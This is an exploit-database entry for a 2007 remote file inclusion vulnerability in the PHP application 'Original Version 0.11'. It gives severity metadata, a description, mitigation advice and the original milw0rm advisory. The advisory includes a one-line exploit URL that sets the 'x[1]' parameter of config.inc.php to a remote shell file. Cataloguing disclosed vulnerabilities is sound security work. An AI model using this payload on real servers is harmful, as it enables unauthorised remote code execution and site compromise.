header-logo
Suggest Exploit
vendor:
Original Version 0.11
by:
GolD_M = [Mahmood_ali]
5.5
CVSS
MEDIUM
Remote File Inclusion
CWE
Product Name: Original Version 0.11
Affected Version From: 0.11
Affected Version To: 0.11
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Original Version 0.11(config.inc.php) Remote File Inclusion Vulnerability

This exploit allows an attacker to include a remote file in the config.inc.php file of Original Version 0.11. By manipulating the 'x[1]' parameter in the URL, an attacker can include a shell or any other remote file.

Mitigation:

To mitigate this vulnerability, it is recommended to apply a patch or upgrade to a newer version of the software. Additionally, make sure to validate and sanitize user input before including any files.
Source

Exploit-DB raw data:

# Original Version 0.11(config.inc.php) Remote File Inclusion Vulnerability
# D.Script: http://xanatos.glo.org.mx/bi/original-0.11.tar.bz2
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.Com/cc
# Exploit:[Path]/inc/config.inc.php?x[1]=Shell
# Greetz To: Tryag-Team ....**

# milw0rm.com [2007-05-10]

Navigation

Suggest Exploit

Services By CQR